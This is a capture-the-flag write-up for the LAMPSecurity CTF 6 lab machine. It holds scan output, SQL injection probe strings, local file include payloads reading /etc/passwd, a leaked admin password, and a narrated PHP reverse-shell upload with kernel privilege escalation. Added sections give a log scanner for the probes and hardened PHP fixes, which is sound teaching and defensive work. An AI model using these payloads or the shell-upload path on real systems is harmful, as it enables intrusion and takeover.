Solution write-up for the LAMPSecurity: CTF 6 Challenge by @killr00t, winner of the challenge

LAMPSecurity CTF6 SOLUTION by killr00t [email protected]


Network Mapping

Target IP: 192.168.1.72

Port Scanning and Banners

Tool: WhatWeb
Result:
http://192.168.1.72 [200] Meta-Author[Justin C. Klein Keane], HTTPServer[CentOS][Apache/2.2.3 (CentOS)], Apache[2.2.3], IP[192.168.1.72], PHP[5.2.6], X-Powered-By[PHP/5.2.6], Cookies[PHPSESSID], Title[CTF 6 - Widgets Inc.], Country[RESERVED][ZZ]

Tool: nikto
Result:
---------------------------------------------------------------------------
+ Server: Apache/2.2.3 (CentOS)
+ Number of sections in the version string differ from those in the database, the server reports: apache/2.2.3 while the database has: 2.2.14. This may cause false positives.
+ Retrieved X-Powered-By header: PHP/5.2.6
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests which contain specific QUERY strings.
+ OSVDB-3092: /files/: This might be interesting...
+ OSVDB-3092: /lib/: This might be interesting...
+ OSVDB-3092: /mail/: This might be interesting...
+ OSVDB-3092: /phpmyadmin/: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3268: /sql/: Directory indexing is enabled: /sql/
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing is enabled: /icons
+ OSVDB-3268: /manual/images/: Directory indexing is enabled: /manual/images
+ OSVDB-3268: /docs/: Directory indexing is enabled: /docs
+ OSVDB-3233: /icons/README: Apache default file found.
+ 3818 items checked: 16 item(s) reported on remote host

Directories

Tool: Dirbuster
Result:

• /cgi-bin
• /files
• /templates
• /icons
• /docs
• /mail
• /js

Tool: nikto
Result:

• /files
• /lib
• /mail
• /phpmyadmin
• /sql
• /manual
• /docs
• /icons

Files of Interest

• /sql/db.sql

    INSERT INTO user SET user_id = 1, user_username='admin', user_password=md5('adminpass');

User => admin
Pass => 25e4ee4e9229397b6b17776bfceaf8e7 => adminpass
DB => cms
Table => user

• /docs/code_backup.tgz

• /conf/config.ini

• /logs/log.log

    2009-06-28 13:06:09 172.16.61.132 called id=4%20UNION%20select%201,1,1,1,1,1%20from%20dual
    2009-06-28 13:06:09 Problem with event select: . The used SELECT statements have a different number of columns
    2009-06-28 13:06:28 172.16.61.132 called id=4%20UNION%20select%201,1,1,1,1,1,1%20from%20dual
    2009-06-28 13:06:29 Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select 1,1,1,1,1,1,1 from dual' at line 1
    2009-06-28 13:06:29 Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select 1,1,1,1,1,1,1 from dual' at line 1
    2009-06-28 13:06:43 172.16.61.132 called id=4%20UNION%20select%20version,1,1,1,1,1,1%20from%20dual
    2009-06-28 13:06:43 Problem with event select: . Unknown column 'version' in 'field list'
    2009-06-28 13:06:52 172.16.61.132 called id=4%20UNION%20select%20version(),1,1,1,1,1,1%20from%20dual
    2009-06-28 13:06:52 Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select version(),1,1,1,1,1,1 from dual' at line 1
    2009-06-28 13:06:52 Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select version(),1,1,1,1,1,1 from dual' at line 1
    2009-06-28 13:06:13 172.16.61.132 called id=4%20UNION%20select%201,2,3,4,5,6,7%20from%20dual
    2009-06-28 13:06:13 Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select 1,2,3,4,5,6,7 from dual' at line 1
    2009-06-28 13:06:13 Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select 1,2,3,4,5,6,7 from dual' at line 1
    2009-06-28 13:06:30 172.16.61.132 called id=4%20UNION%20select%201,2,3,4,5,6,version()%20from%20dual
    2009-06-28 13:06:30 Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select 1,2,3,4,5,6,version() from dual' at line 1

Note: in this backup some vulnerabilities had already been identified; it is worth reviewing the requests that were made in order to escalate faster.
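The log entries above are exactly the kind of probe a defender wants to detect, ideally long before a backup of the log ends up in a web-readable directory. The following scanner is an added example, not code from the write-up or from the CTF image; it assumes the log format shown above and that the application only ever expects a numeric id parameter.

```php
<?php
// Added example (not from the write-up or the CMS): a scanner for lines in the format
// of the CMS's /logs/log.log. It parses the "<timestamp> <ip> called <query>" entries,
// percent-decodes the id parameter and flags values that are not a plain integer.

/** Parse one "called" line into its parts; "Problem with ..." lines return null. */
function parse_called_line(string $line): ?array
{
    $re = '/^(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) (\d{1,3}(?:\.\d{1,3}){3}) called (.*)$/';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    parse_str($m[3], $params); // parse_str also percent-decodes the values
    return ['ts' => $m[1], 'ip' => $m[2], 'id' => (string) ($params['id'] ?? '')];
}

/** Classify the decoded id (assumption: the application only expects a numeric id). */
function classify_id(string $id): ?string
{
    if (preg_match('/^\d+$/', $id)) {
        return null; // benign
    }
    return preg_match('/\bunion\b.*\bselect\b/i', $id) ? 'union-select probe' : 'non-numeric id';
}

/** One "ts ip verdict: decoded id" line per suspicious request, in log order. */
function scan_log(array $lines): array
{
    $hits = [];
    foreach ($lines as $line) {
        $e = parse_called_line($line);
        $verdict = $e === null ? null : classify_id($e['id']);
        if ($verdict !== null) {
            $hits[] = sprintf('%s %s %s: %s', $e['ts'], $e['ip'], $verdict, $e['id']);
        }
    }
    return $hits;
}

// Constructed sample: two entries copied from the log above plus one benign request.
$sample = [
    '2009-06-28 13:06:09 172.16.61.132 called id=4%20UNION%20select%201,1,1,1,1,1%20from%20dual',
    '2009-06-28 13:06:09 Problem with event select: . The used SELECT statements have a different number of columns',
    '2009-06-28 13:06:52 172.16.61.132 called id=4%20UNION%20select%20version(),1,1,1,1,1,1%20from%20dual',
    '2009-06-28 13:07:00 172.16.61.140 called id=4',
];
foreach (scan_log($sample) as $hit) {
    echo $hit, PHP_EOL; // prints the two 172.16.61.132 probes, not the plain id=4
}
```

Run it with `php scan.php` against the real file by replacing `$sample` with `file('/path/to/log.log', FILE_IGNORE_NEW_LINES)`; the "Problem with ..." lines are skipped because they carry no request.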

Vulnerability Identification (code_backup.tgz)

File: /actions/login.php
Code:
---------------------------------------------------------------------------

    if (isset($_POST['username']) && isset($_POST['password'])) {
        $sql = "select user_id from user where user_username = '" . $_POST['username'] . "'";
        $query = mysql_query($sql) or die("Query error with $sql: " . mysql_error());
        if ($query && mysql_num_rows($query) > 0) {
            //user exists
            $uname = mysql_fetch_object($query);
            $sql = "select * from user where user_id = " . $uname->user_id .
                " AND user_password = md5('" . $_POST['password'] . "')";
            $query = mysql_query($sql)
                or $log->append("Query error in login $sql<hr/> " . mysql_error());
            $retval = array();
            if (! $query) {
                //no return value
            } else {
                $retval = mysql_fetch_object($query);
            }
        }
        if (isset($retval->user_id)) {
            setcookie("logged_in", 1, time()+3600);
            setcookie("user_id", $retval->user_id, time()+3600);
            setcookie("hash", $retval->user_password, time()+3600);
            $logged_in = 1;
        }
    }

    if ($logged_in) include_once('templates/logged_in.tpl');
    else include_once('templates/'.$_GET['action'].'.tpl');

Vulnerability: SQL Injection
Vulnerable variables: username, password
Description: The parameters are not filtered, which allows interacting with the database and extracting information. The submitted values are used directly in the queries: first the username variable is checked, and if the user exists the second variable, password, is checked. Both are vulnerable.

Vulnerability: Local File Include
Vulnerable variable: action
Description: Allows files outside the web directory to be included via GET.
Exploit: /actions/login.php?action=../../../../../etc/passwd%00

File: /actions/add_event.php
Code:

    if (! $logged_in) header("Location:index.php");

    $log->append("Adding file!") or die("Couldn't append to log for some reason!");

    if (isset($_POST['title'])) {
        if (isset($_FILES['upload'])) {
            $uploaddir = 'files/';
            $uploadfile = $uploaddir . basename($_FILES['upload']['name']);
            if (! move_uploaded_file($_FILES['upload']['tmp_name'], $uploadfile)) {
                $log->append("Log upload problem with file array: $_FILES");
                $log->append("Upload file name: $uploadfile");
                $log->append("Upload file tmp name: " . $_FILES['upload']['tmp_name']);
            }
        }
        $sql = "insert into event set event_title='" . $_POST['title'] . "',
            event_body='" . addslashes($_POST['body']) . "',
            event_file='" . $uploadfile . "',
            user_id = " . $_COOKIE['user_id'];
        mysql_query($sql) or $log->append("Problem with insert. " . mysql_error());
    }
    include_once('templates/'.$_GET['action'].'.tpl');

Vulnerability: Local File Include
Vulnerable variable: action
Description: Allows files outside the web directory to be included via GET.
Exploit: /actions/add_event.php?action=../../../../../etc/passwd%00

Vulnerability: File upload
Description: Allows uploading files that let me execute operating-system commands, because the code does not validate the file extension at all.

Note: All the files have programming flaws; I will only use this last one to upload the shell directly and escalate privileges.
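The three flaws called out above (string-built SQL in login.php, the unchecked action include in both files, and the unvalidated upload in add_event.php) each have a straightforward fix. The following is an added example, not code from the CTF image or the write-up; it assumes a PDO connection to the cms database with the user table from db.sql, template names matching the action values used on this page, and an upload directory outside the web root.

```php
<?php
// Added example (not the CTF's own code): hardened counterparts of the three flaws in
// login.php and add_event.php. Assumptions: a PDO connection $db to the "cms" database
// with the "user" table from db.sql, and an upload directory outside the web root.

/** Login: username and password are bound parameters, so quotes in them stay data. */
function login(PDO $db, string $username, string $password): ?array
{
    $stmt = $db->prepare('SELECT user_id, user_password FROM user WHERE user_username = ?');
    $stmt->execute([$username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    // db.sql stores md5() hashes; compare them in constant time. Migrating the column to
    // password_hash() is the proper fix, but is out of scope for the injection issue.
    if ($row === false || !hash_equals($row['user_password'], md5($password))) {
        return null;
    }
    return $row;
}

/** Template include: the GET value selects from a fixed list and never builds a path. */
function template_for(string $action): string
{
    $allowed = ['login', 'add_event', 'logged_in']; // assumed template names
    if (!in_array($action, $allowed, true)) {
        $action = 'login'; // "../../etc/passwd%00" is simply not in the list
    }
    return __DIR__ . '/templates/' . $action . '.tpl';
}

/** Upload: allowlisted extension, sniffed MIME type, server-chosen name, non-web directory. */
function store_upload(array $file, string $storeDir): ?string
{
    $allowed = ['pdf' => 'application/pdf', 'png' => 'image/png', 'jpg' => 'image/jpeg'];
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return null;
    }
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    // sh.php fails the extension check; sh.php renamed to sh.png fails the MIME check.
    if (!isset($allowed[$ext]) || $allowed[$ext] !== $mime) {
        return null;
    }
    $name = bin2hex(random_bytes(16)) . '.' . $ext; // never reuse the client's file name
    $dest = rtrim($storeDir, '/') . '/' . $name;
    return move_uploaded_file($file['tmp_name'], $dest) ? $name : null;
}
```

Serve stored files through a download script that looks up the server-chosen name in the event table rather than exposing the storage directory, so nothing uploaded is ever interpreted by Apache.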

Exploitation and Privilege Escalation

File: /actions/add_event.php
Exploit: file upload
Description: a PHP shell is chosen and the event is added while logged in to the CMS

• LOG IN TO THE CMS

User: admin
Pass: adminpass

Note: these credentials were already recovered from the SQL file found earlier.

• ADD EVENTS: In this section there is a menu whose vulnerable code we have already seen, and it lets us upload the shell directly

• SHELL UPLOAD

Fill in the form, choose my shell (sh.php) and click Add event

The reverse-connection backdoor is uploaded to make running commands more comfortable

It gives us a series of local exploits we can use; I will use http://www.exploit-db.com/exploits/8478/ since it is the only one that worked for me. There are several for that kernel version, but as I said, only this one worked for me.

We add ourselves to the system with privileges and log in through SSH

We set a password for the user and connect through SSH

Root Owned! Regards